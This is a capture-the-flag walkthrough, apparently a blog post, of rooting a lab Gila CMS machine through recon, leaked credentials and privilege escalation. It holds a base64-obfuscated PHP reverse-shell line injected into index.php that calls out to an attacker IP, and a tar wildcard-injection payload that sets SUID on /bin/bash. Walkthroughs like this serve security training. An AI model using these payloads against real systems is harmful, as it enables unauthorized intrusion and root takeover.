Machine Info
Difficulty: Medium🟧
Link:Â HERE
Avg time: 75 Minutes
OS: Linux
Description:Â Can you root this Gila CMS box?
Recon
INFO: Before
nmapwe are told to add[IP] cmess.thmto/etc/hosts
Casually nmap scan
sudo nmap cmess.thm -Pn -sV -sC -p- -T4 -n -O -oN scan.txt
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-15 13:54 +0200
Nmap scan report for cmess.thm (10.114.129.136)
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_ 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/15%OT=22%CT=1%CU=42629%PV=Y%DS=3%DC=I%G=Y%TM=6A2FE82
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%
OS:CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FC%GC
OS:D=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E
OS:8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%
OS:W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.60 seconds
Scan reveals:
- 22/tcp - SSH
- 80/tcp - HTTP
HTTP got robots.txt with 3 entries:
src/themes/lib/
Shell as www-data
My first thought was to visit src/ it did redirect to something looking like potential LFI
But no matter what I tried I couldn't retrieve /etc/passwd either RFI didn't worked too.
INFO: Other entries in
robots.txtwere the same I tested them but nothing
Later I tried running Feroxbuster there were some not usual files and directories
sudo feroxbuster -u 'http://cmess.thm/' -r -C 404
403 GET 9l 28w 274c http://cmess.thm/lib/?url=lib
403 GET 9l 28w 274c http://cmess.thm/src/?url=src
403 GET 9l 28w 274c http://cmess.thm/themes/?url=themes
200 GET 107l 290w 3851c http://cmess.thm/index
200 GET 44l 113w 1605c http://cmess.thm/src/core/assets/lazyImgLoad.js
200 GET 43l 98w 1360c http://cmess.thm/login/password_reset
200 GET 799l 1024w 15763c http://cmess.thm/lib/gila.min.css
200 GET 4l 66w 31000c http://cmess.thm/lib/font-awesome/css/font-awesome.min.css
200 GET 92l 266w 3353c http://cmess.thm/about
200 GET 68l 422w 25046c http://cmess.thm/assets/gila-logo.png
200 GET 107l 290w 3851c http://cmess.thm/search
200 GET 107l 290w 3851c http://cmess.thm/blog
200 GET 41l 99w 1580c http://cmess.thm/login
200 GET 109l 291w 3862c http://cmess.thm/category
200 GET 102l 308w 4078c http://cmess.thm/1/hello_world
200 GET 107l 290w 3865c http://cmess.thm/
200 GET 102l 308w 4078c http://cmess.thm/1
200 GET 1l 4w 68c http://cmess.thm/login/register
200 GET 21l 42w 735c http://cmess.thm/feed
200 GET 107l 290w 3851c http://cmess.thm/0
200 GET 101l 272w 3590c http://cmess.thm/author
200 GET 102l 308w 4078c http://cmess.thm/01
200 GET 109l 292w 3874c http://cmess.thm/tag
200 GET 107l 290w 3851c http://cmess.thm/Search
200 GET 92l 266w 3339c http://cmess.thm/About
200 GET 107l 290w 3851c http://cmess.thm/Index
200 GET 0l 0w 0c http://cmess.thm/api
200 GET 1l 4w 68c http://cmess.thm/login/Register
200 GET 14l 40w 563c http://cmess.thm/assets/?url=assets
500 GET 0l 0w 0c http://cmess.thm/cm
200 GET 0l 0w 0c http://cmess.thm/fm
200 GET 107l 290w 3851c http://cmess.thm/INDEX
200 GET 0l 0w 0c http://cmess.thm/login/callback
There were some weird outputs but most of them were not found or main page. Only thing that caught my attention was possible IDOR.
http://cmess.thm/0
It was returning home page with post that contained title and body of it. but
http://cmess.thm/1
returned title, posted by and body but posted by was empty which was weird. I did tried other numbers such as 2, 3, 4 but they returned not found so it was a rabbit hole. Ferox also revealed path /login/register but it redirected to 404 — another rabbit hole. I also tried brute force on login/ with guessed email admin@cmess.thm but after 3 tries I got rate limited — another rabbit hole. This whole page seemed like a dead end so I tried subdomain enum with ffuf.
ffuf -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 522 -c
This finally gave some serious lead
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cmess.thm
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.cmess.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 522
________________________________________________
dev [Status: 200, Size: 934, Words: 191, Lines: 31, Duration: 4663ms]
:: Progress: [4989/4989] :: Job [1/1] :: 295 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
Adding dev.cmess.thm to /etc/hosts and visiting it revealed a black page with a Development Log containing credentials for andre@cmess.thm
## Development Log
### andre@cmess.thm
Have you guys fixed the bug that was found on live?
### support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
### support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances
### andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
### support@cmess.thm
Your password has been reset. Here: KPFTN_f2yxe%
Credentials worked. There was a CMS dashboard with page editing functionality. In most CMS dashboards, if page editing is available, getting a shell is trivial. At /admin/fm there is a list of files and directories. Editing index.php can give a shell. Penelope was used as it handles and stabilizes the shell automatically.
INFO: In this file list there was an interesting file
config.phpcontaining root credentials for MySQL, maybe useful for later.
Code injected into index.php:
<?php system('printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEzMS45MSA0NDQ0ID4vdG1wL18pID4vZGV2L251bGwgMj4mMSAm|base64 -d|sh'); ?>
After saving and visiting the main page, Penelope catches a shell as www-data.
Shell as Andre
Password reuse from the login page was attempted but didn't work. linpeas and pspy64 were transferred to the target. pspy64 revealed a cronjob running as root every 2 minutes but it wasn't investigated further at this point.
INFO: The cronjob wasn't investigated because write access to
/home/andrewas required.
linpeas kept crashing so manual enumeration was done. MySQL was checked using the credentials found earlier but nothing useful was found. Eventually /opt was checked — an obvious privesc path that was missed earlier due to linpeas issues. Inside was .password.bak with Andre's password.
www-data@cmess:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 22 root root 4096 Feb 6 2020 ..
-rwxrwxrwx 1 root root 36 Feb 6 2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
andres backup password
UQfsdCB7aAP6
Flag located at: /home/andre/user.txt
Shell as Root
The root cronjob was performing a backup of every file in /home/andre/backup.
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
The * wildcard is the key. tar supports --checkpoint flags that execute commands at intervals. By creating files named --checkpoint=1 and --checkpoint-action=exec=[command] inside the backup directory, tar interprets them as its own flags instead of files.
INFO: Different explanation of tar wildcard injection HERE
A malicious shell.sh was created with the following payload:
#!/bin/bash
chmod +s /bin/bash
Execute permission was added and checkpoint files were created:
chmod +x shell.sh
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=bash shell.sh"
Final state of the backup directory:
andre@cmess:~/backup$ ls -al
total 24
drwxr-x--- 2 andre andre 4096 Jun 15 06:14 .
drwxr-x--- 5 andre andre 4096 Jun 15 06:12 ..
-rw-rw-r-- 1 andre andre 1 Jun 15 06:14 --checkpoint=1
-rw-rw-r-- 1 andre andre 1 Jun 15 06:14 --checkpoint-action=exec=bash shell.sh
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note
-rwxrwxr-x 1 andre andre 32 Jun 15 06:12 shell.sh
After the cronjob fired, shell.sh was executed as root and SUID was set on /bin/bash, allowing a root shell via bash -p
Flag located in /root/root.txt

Top comments (0)